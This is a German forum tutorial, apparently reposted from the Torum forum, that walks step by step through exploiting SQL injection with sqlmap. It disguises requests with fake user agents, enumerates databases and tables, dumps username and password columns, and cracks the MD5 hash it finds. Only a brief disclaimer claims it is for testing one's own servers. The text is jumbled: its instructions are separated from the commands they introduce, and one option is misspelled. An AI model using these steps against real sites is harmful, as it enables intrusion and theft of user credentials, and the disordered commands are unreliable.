SQLmap ist ein leistungsfähiges Werkzeug, um SQLi-Schwachstellen auszunutzen. Die grundlegende Verwendung ist
Es gibt viele Optionen zum Anpassen von SQL Map:
Mit --user-agent= kann man einstellen, von welchem User-Agent die Anfragen kommen:
Oder eine zufällig generierte mit:
Ihr können auch die Anzahl der Threads festlegen, mit denen gearbeitet werden soll
Wenn das SQLi boolean-based ist, muss man die Abfrage möglicherweise noch eingehender prüfen, indem das Standardlevel und das Risiko von 1 bis 5 und 3 erhöhen. Dies ist zwar ungenauer, kann jedoch erforderlich sein.
Ausserdem kann man noch DBMS erzwingen:
Benutzen wir zunächst, was wir gelernt haben:
Falls dies erfolgreich durchgeführt wurde, sollte man folgendes (oder ähnliches sehen):
Jetzt den Aufwärtspfeil drücken, um den vorherigen Befehl anzuzeigen. Ersetzt die Option --db durch -D NameDerTabelle und fügt --tables hinzu. Dadurch werden die Tabellen für diese Datenbank aufgelistet.
Jetzt kann man folgendes verwenden:
oder
Folgendes kommt dabei dann heraus:
Jetzt muss man nur noch das Passwort cracken. In diesem Fall ist es MD5 und das Passwort ist "passwort". Wenn der Sysadmin faul ist, werden die Kennwörter manchmal im Klartext angezeigt.
Das Tutorial wird nur zum Testen an eigenen Geräten und Servern zur Verfügung gestellt. Gefunden auf Torum ohne Gewähr
Code:
:~$ sqlmap -u "http://website.com/vulnerable?query=50" --db
Mit --user-agent= kann man einstellen, von welchem User-Agent die Anfragen kommen:
Code:
--user-agent = GoogleBOT
Code:
--random-agent
Code:
--threads=5 (Standard ist 1)
Code:
--level=5 --risk=3
Code:
--dbms=mysql (oder postgresql/microsoft sql server/ etc)
Code:
:~$ sqlmap -u "http://website.com/vulnerable?query=50" --threads=5 --level=5 --risk=3 --random-agent --dbms=mysql --keep-alive --dbs
Code:
available databases [2]:[*] information_schema[*] Main_DB (or whatever it's called)
Jetzt kann man folgendes verwenden:
Code:
-D NameDerTabelle -T TabellenName --colums --dump
Code:
-D NameDerTabelle -T Tabellenname -C ColumnName --dump
Code:
+----+---------------------------------------------+ | id | username | password +----+---------------------------------------------+ | 1 | Anon | 5f4dcc3b5aa765d61d8327deb882cf99 +----+---------------------------------------------+
Das Tutorial wird nur zum Testen an eigenen Geräten und Servern zur Verfügung gestellt. Gefunden auf Torum ohne Gewähr